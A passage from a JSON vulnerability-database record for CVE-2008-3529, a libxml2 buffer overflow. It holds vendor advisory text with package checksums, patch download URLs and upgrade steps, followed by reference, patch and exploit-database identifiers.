fb670bfb1a1673f99f3c3fc3a72b7777  2008.1/x86_64/libxml2-utils-2.6.31-1.3mdv2008.1.x86_64.rpm \n b1078a83185c1c97fada7ea5e97df753  2008.1/SRPMS/libxml2-2.6.31-1.3mdv2008.1.src.rpm\n\n Corporate 3.0:\n 82e733037c09b4b7770f5325c7ed1325  corporate/3.0/i586/libxml2-2.6.6-1.5.C30mdk.i586.rpm\n d66da7916f188883fd164cb250431bba  corporate/3.0/i586/libxml2-devel-2.6.6-1.5.C30mdk.i586.rpm\n 5df28181424b19132bbff6afa872475a  corporate/3.0/i586/libxml2-python-2.6.6-1.5.C30mdk.i586.rpm\n f7a86c3be6e4926fa101386a9cbbcbdd  corporate/3.0/i586/libxml2-utils-2.6.6-1.5.C30mdk.i586.rpm \n c64826e1b31ed0c5d4514780ecd52e2e  corporate/3.0/SRPMS/libxml2-2.6.6-1.5.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n 76e631bd88c68085dc2c5702235c2a99  corporate/3.0/x86_64/lib64xml2-2.6.6-1.5.C30mdk.x86_64.rpm\n 827f9f5bc3a1b869353e3c09879ea432  corporate/3.0/x86_64/lib64xml2-devel-2.6.6-1.5.C30mdk.x86_64.rpm\n caafa3371f80f084e8a945b3114b4533  corporate/3.0/x86_64/lib64xml2-python-2.6.6-1.5.C30mdk.x86_64.rpm\n e37a70f9cd13a7e00982387a9ba97726  corporate/3.0/x86_64/libxml2-utils-2.6.6-1.5.C30mdk.x86_64.rpm \n c64826e1b31ed0c5d4514780ecd52e2e  corporate/3.0/SRPMS/libxml2-2.6.6-1.5.C30mdk.src.rpm\n\n Corporate 4.0:\n 74eea161b5519eef6c16b2407126a847  corporate/4.0/i586/libxml2-2.6.21-3.4.20060mlcs4.i586.rpm\n 5d8d1e0e487022687c1c61fbaf91707e  corporate/4.0/i586/libxml2-devel-2.6.21-3.4.20060mlcs4.i586.rpm\n d5aa677468c9e8baae074a12f6c63c00  corporate/4.0/i586/libxml2-python-2.6.21-3.4.20060mlcs4.i586.rpm\n d51b4b902bb911be69f6a17aeb07d8cf  corporate/4.0/i586/libxml2-utils-2.6.21-3.4.20060mlcs4.i586.rpm \n ce28651304236296e59d6d3be5525889  corporate/4.0/SRPMS/libxml2-2.6.21-3.4.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n 812f2ae0ffa7a72546b07bd7de174453  corporate/4.0/x86_64/lib64xml2-2.6.21-3.4.20060mlcs4.x86_64.rpm\n 23ae06098f957e46affa75220cac50af  corporate/4.0/x86_64/lib64xml2-devel-2.6.21-3.4.20060mlcs4.x86_64.rpm\n 93cb252dadfadd4249062f903e604f82  corporate/4.0/x86_64/lib64xml2-python-2.6.21-3.4.20060mlcs4.x86_64.rpm\n aeff512a1b349108017e93633fabcf08  corporate/4.0/x86_64/libxml2-utils-2.6.21-3.4.20060mlcs4.x86_64.rpm \n ce28651304236296e59d6d3be5525889  corporate/4.0/SRPMS/libxml2-2.6.21-3.4.20060mlcs4.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (GNU/Linux)\n\niD8DBQFIyaCLmqjQ0CJFipgRApioAJ9P7O5hzNQ4UuYvEIhTVLyyn9Tv9wCg4DSp\nmZuI5mJOfDomJXN1l5E7NSw=\n=tPwM\n-----END PGP SIGNATURE-----\n.  This could allow the execution of arbitrary\ncode via a malicious XML file. \n\nFor the stable distribution (etch), this problem has been fixed in version\n2.6.27.dfsg-5. \n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.6.32.dfsg-4. \n\nWe recommend that you upgrade your libxml2 package. \n\n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.diff.gz\n    Size/MD5 checksum:   220443 48cafbb8d1bd2c6093339fea3f14e4a0\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg.orig.tar.gz\n    Size/MD5 checksum:  3416175 5ff71b22f6253a6dd9afc1c34778dec3\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.dsc\n    Size/MD5 checksum:      893 0dc1f183dd20741e5b4e26a7f8e1c652\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-doc_2.6.27.dfsg-5_all.deb\n    Size/MD5 checksum:  1328144 c1c5f0ceb391893a94e61c074b677ee9\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_alpha.deb\n    Size/MD5 checksum:   820850 fac5556241bb0fde20913f25fb9c73ac\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_alpha.deb\n    Size/MD5 checksum:    37980 725b1c6925e610b5843ba0ad554dc7bc\n  http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_alpha.deb\n    Size/MD5 checksum:   184754 5ccbaf07b44dcfe528167074050bf270\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_alpha.deb\n    Size/MD5 checksum:   916830 17d71480b7e2a447dabde99c11d752fa\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_alpha.deb\n    Size/MD5 checksum:   881834 cac19a28b37f7afb9e07966f44ddd5b2\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_amd64.deb\n    Size/MD5 checksum:   184130 a13372752d162d0fb2ccd58da6b73e20\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_amd64.deb\n    Size/MD5 checksum:    36684 8a0265229bebf9245dc7bb7cc6f41d36\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_amd64.deb\n    Size/MD5 checksum:   796194 6019e59020269cca8fa8fea40f83c118\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_amd64.deb\n    Size/MD5 checksum:   891922 606fc28448bead2709c39a1d3e529a25\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_amd64.deb\n    Size/MD5 checksum:   745758 95bd39eb2818772c43c3351b22326fcd\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_arm.deb\n    Size/MD5 checksum:   741876 1b670c6bac3aa9f7df28f7ea3f1e5725\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_arm.deb\n    Size/MD5 checksum:    34678 9a992dc251b137a919a813eed2af8489\n  http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_arm.deb\n    Size/MD5 checksum:   165290 732b4e94b91a086c6b950d187af160bc\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_arm.deb\n    Size/MD5 checksum:   817514 299c93a812ac02a8aa9da88f4cb5aedf\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_arm.deb\n    Size/MD5 checksum:   673192 d2ff2c26ee8dae05f81c24aa6dfce9b5\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_hppa.deb\n    Size/MD5 checksum:   191876 4d2e33090237b47bc10e9526329f0bc5\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_hppa.deb\n    Size/MD5 checksum:    36708 0ebf8554c5a0e873b128d52ceafccdfd\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_hppa.deb\n    Size/MD5 checksum:   850210 bde343770ac9a7bd458e68a60c2b8434\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_hppa.deb\n    Size/MD5 checksum:   858660 88f67d0d2aff41333ca2f4d4b2d6b5b2\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_hppa.deb\n    Size/MD5 checksum:   864474 489dbd9d677c274c07abb88d0f23b969\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_i386.deb\n    Size/MD5 checksum:   755986 9fdf341ede17d7790202229db9cc1353\n  http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_i386.deb\n    Size/MD5 checksum:   169032 272c6be290817bf9cb8b401425fd83d5\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_i386.deb\n    Size/MD5 checksum:   681472 d8a0611d638e0553da64a218fbcf291a\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_i386.deb\n    Size/MD5 checksum:   857318 6946048170dd7d142c03c13794c30d6f\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_i386.deb\n    Size/MD5 checksum:    34496 3e3674a714f780024630ad1a2ca46eab\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_ia64.deb\n    Size/MD5 checksum:  1106480 03e08564e2bf843905daecdd7c5cc4c4\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_ia64.deb\n    Size/MD5 checksum:   874222 ed9ab6fa068a5b07c22ec1c10db8e0ab\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_ia64.deb\n    Size/MD5 checksum:  1080186 defc5f4f9eb80872a793cc025e33a111\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_ia64.deb\n    Size/MD5 checksum:    48492 5a567323dc0bf8159a6eae87957266d5\n  http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_ia64.deb\n    Size/MD5 checksum:   196536 cdbb137c8bb31cf29114673c4cb28e67\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_mips.deb\n    Size/MD5 checksum:    34418 4a05346cb2fc6c314e7e8aef21662469\n  http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_mips.deb\n    Size/MD5 checksum:   171678 c94bfffc6bde639623ce9a91028960e5\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_mips.deb\n    Size/MD5 checksum:   926922 ddc8ff03120dd78869830d38a5e8708d\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_mips.deb\n    Size/MD5 checksum:   840642 57f2ea24a31904c4b07531f6292a4a8e\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_mips.deb\n    Size/MD5 checksum:   770246 20ba2586e1406d66bd34642f13265dcf\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_mipsel.deb\n    Size/MD5 checksum:    34398 9f0ebfb1dc37496e6b7a4e9963ffaeff\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_mipsel.deb\n    Size/MD5 checksum:   898346 29680d5d5baa66e251e71f55aa128e3c\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_mipsel.deb\n    Size/MD5 checksum:   768976 8f6464a0ef61b3ddcd271652a01c7469\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_mipsel.deb\n    Size/MD5 checksum:   833252 5c83c05d44526479e7c550fd0d8cbdbe\n  http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_mipsel.deb\n    Size/MD5 checksum:   168690 eb56cb1ea49795d0a5a18af468625941\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_powerpc.deb\n    Size/MD5 checksum:   898010 c3d61392afcb383d0f27d5f91fda721d\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_powerpc.deb\n    Size/MD5 checksum:   770994 94ef895f8942b880e8823e10420120e6\n  http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_powerpc.deb\n    Size/MD5 checksum:   172726 5d097f0290be2bab9b93287bad07e83f\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_powerpc.deb\n    Size/MD5 checksum:    37660 e977bc38e837077de7a006ef923b98bd\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_powerpc.deb\n    Size/MD5 checksum:   779958 ad7245f8a9980d7f40234aefaf12a31b\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_s390.deb\n    Size/MD5 checksum:   185726 91661276ed6cf371373b4e61805c81b8\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_s390.deb\n    Size/MD5 checksum:   885618 218f2603ab94bf92ba45cd330fe15782\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_s390.deb\n    Size/MD5 checksum:   806024 3abe21a0d756e5a0a2ca646f0ba32729\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_s390.deb\n    Size/MD5 checksum:    36378 cbc5eb7e2f81adafeba8e857aee8c918\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_s390.deb\n    Size/MD5 checksum:   750190 4172cb95d7aea2f9ee9331220cd5274c\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_sparc.deb\n    Size/MD5 checksum:   781522 c20ea9c8ab0ec798488e68c845650036\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_sparc.deb\n    Size/MD5 checksum:   713144 e0139b86fbf9644678c2c6de6462bff1\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_sparc.deb\n    Size/MD5 checksum:   759568 7d46f7ceb214711851cc1f27edef2c48\n  http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_sparc.deb\n    Size/MD5 checksum:    34580 fceb65808b2c98f621d79352eea9d2d5\n  http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_sparc.deb\n    Size/MD5 checksum:   176874 f27821fe07861f2e71658bc3eb0a595e\n\n\n  These files will probably be moved into the stable distribution on\n  its next update. \n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show \u003cpkg\u003e\u0027 and http://packages.debian.org/\u003cpkg\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (GNU/Linux)\n\niD4DBQFI9N2RwM/Gs81MDZ0RAqP7AJYxbWnJqF4zauFOietE80FTYW02AKDCOBt2\nwvZ3MJ4FZeRn990jpLrh1A==\n=FZQi\n-----END PGP SIGNATURE-----\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2008-3529"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001702"
          },
          {
            "db": "BID",
            "id": "31126"
          },
          {
            "db": "VULHUB",
            "id": "VHN-33654"
          },
          {
            "db": "VULMON",
            "id": "CVE-2008-3529"
          },
          {
            "db": "PACKETSTORM",
            "id": "72532"
          },
          {
            "db": "PACKETSTORM",
            "id": "80275"
          },
          {
            "db": "PACKETSTORM",
            "id": "69917"
          },
          {
            "db": "PACKETSTORM",
            "id": "70915"
          }
        ],
        "trust": 2.43
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-33654",
            "trust": 0.1,
            "type": "unknown"
          },
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=8798",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-33654"
          },
          {
            "db": "VULMON",
            "id": "CVE-2008-3529"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2008-3529",
            "trust": 3.3
          },
          {
            "db": "BID",
            "id": "31126",
            "trust": 2.9
          },
          {
            "db": "SECUNIA",
            "id": "31868",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "31860",
            "trust": 2.6
          },
          {
            "db": "SECTRACK",
            "id": "1020855",
            "trust": 2.5
          },
          {
            "db": "SECUNIA",
            "id": "31982",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "36173",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "32280",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "31558",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "32265",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "35074",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "31855",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "32807",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "33715",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "33722",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "35379",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "36235",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "35056",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "32974",
            "trust": 1.8
          },
          {
            "db": "USCERT",
            "id": "TA09-133A",
            "trust": 1.8
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-1297",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-1522",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-1621",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2822",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-1298",
            "trust": 1.7
          },
          {
            "db": "EXPLOIT-DB",
            "id": "8798",
            "trust": 1.7
          },
          {
            "db": "XF",
            "id": "45085",
            "trust": 0.8
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2419",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001702",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200809-180",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "80275",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "70915",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "77817",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "78575",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-33654",
            "trust": 0.1
          },
          {
            "db": "VUPEN",
            "id": "2009/1297",
            "trust": 0.1
          },
          {
            "db": "VUPEN",
            "id": "2008/2822",
            "trust": 0.1
          },
          {
            "db": "VUPEN",
            "id": "2009/1298",
            "trust": 0.1
          },
          {
            "db": "VUPEN",
            "id": "2009/1522",
            "trust": 0.1
          },
          {
            "db": "VUPEN",
            "id": "2009/1621",
            "trust": 0.1
          },
          {
            "db": "EXPLOITDB",
            "id": "8798",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2008-3529",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "72532",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "69917",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-33654"
          },
          {
            "db": "VULMON",
            "id": "CVE-2008-3529"
          },
          {
            "db": "BID",
            "id": "31126"
          },
          {
            "db": "PACKETSTORM",
            "id": "72532"
          },
          {
            "db": "PACKETSTORM",
            "id": "80275"
          },
          {
            "db": "PACKETSTORM",
            "id": "69917"
          },
          {
            "db": "PACKETSTORM",
            "id": "70915"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200809-180"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001702"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-3529"
          }
        ]
      },
      "id": "VAR-200809-0566",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-33654"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2026-03-09T20:56:44.866000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "HT3639",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT3639"
          },
          {
            "title": "HT3613",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT3613"
          },
          {
            "title": "HT3549",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT3549"
          },
          {
            "title": "HT3639",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT3639?viewlocale=ja_JP"
          },
          {
            "title": "HT3613",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT3613?viewlocale=ja_JP"
          },
          {
            "title": "HT3549",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT3549?viewlocale=ja_JP"
          },
          {
            "title": "libxml2-2.6.26-2.1.2.6.1AXS3",
            "trust": 0.8,
            "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=348"
          },
          {
            "title": "1315",
            "trust": 0.8,
            "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1315"
          },
          {
            "title": "1344",
            "trust": 0.8,
            "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1344"
          },
          {
            "title": "RHSA-2008:0884",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2008-0884.html"
          },
          {
            "title": "RHSA-2008:0886",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2008-0886.html"
          },
          {
            "title": "CVE-2008-3529 Buffer overflow vulnerability in libxml2",
            "trust": 0.8,
            "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2008_3529_buffer_overflow"
          },
          {
            "title": "247346",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-247346-1"
          },
          {
            "title": "2.7.1: Sep 1 2008",
            "trust": 0.8,
            "url": "http://xmlsoft.org/news.html"
          },
          {
            "title": "RHSA-2008:0884",
            "trust": 0.8,
            "url": "https://www.jp.redhat.com/support/errata/RHSA/RHSA-2008-0884J.html"
          },
          {
            "title": "RHSA-2008:0886",
            "trust": 0.8,
            "url": "https://www.jp.redhat.com/support/errata/RHSA/RHSA-2008-0886J.html"
          },
          {
            "title": "Debian CVElist Bug Report Logs: libxml2: does not correctly handle long entity names (CVE-2008-3529)",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=ed42fcb753aa36b8c706df356b4944fb"
          },
          {
            "title": "Ubuntu Security Notice: libxml2 vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-644-1"
          },
          {
            "title": "Ubuntu Security Notice: libxml2 vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-815-1"
          },
          {
            "title": "VMware Security Advisories: Updated ESX packages for libxml2, ucd-snmp, libtiff",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=4b3f89e87c3a2b8f6ca491f31d73afa9"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2008-3529"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001702"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-33654"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001702"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-3529"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "http://securitytracker.com/id?1020855"
          },
          {
            "trust": 2.6,
            "url": "http://www.securityfocus.com/bid/31126"
          },
          {
            "trust": 2.6,
            "url": "http://secunia.com/advisories/31860"
          },
          {
            "trust": 2.6,
            "url": "http://secunia.com/advisories/31868"
          },
          {
            "trust": 2.1,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-265329-1"
          },
          {
            "trust": 2.1,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2008-400.htm"
          },
          {
            "trust": 2.1,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2009-025.htm"
          },
          {
            "trust": 1.9,
            "url": "http://security.gentoo.org/glsa/glsa-200812-06.xml"
          },
          {
            "trust": 1.9,
            "url": "https://usn.ubuntu.com/644-1/"
          },
          {
            "trust": 1.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-247346-1"
          },
          {
            "trust": 1.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-261688-1"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/31558"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/31855"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/31982"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/32265"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/32280"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/32807"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/32974"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/33715"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/33722"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/35056"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/35074"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/35379"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/36173"
          },
          {
            "trust": 1.8,
            "url": "http://secunia.com/advisories/36235"
          },
          {
            "trust": 1.8,
            "url": "https://www.exploit-db.com/exploits/8798"
          },
          {
            "trust": 1.8,
            "url": "http://www.vupen.com/english/advisories/2008/2822"
          },
          {
            "trust": 1.8,
            "url": "http://www.vupen.com/english/advisories/2009/1297"
          },
          {
            "trust": 1.8,
            "url": "http://www.vupen.com/english/advisories/2009/1298"
          },
          {
            "trust": 1.8,
            "url": "http://www.vupen.com/english/advisories/2009/1522"
          },
          {
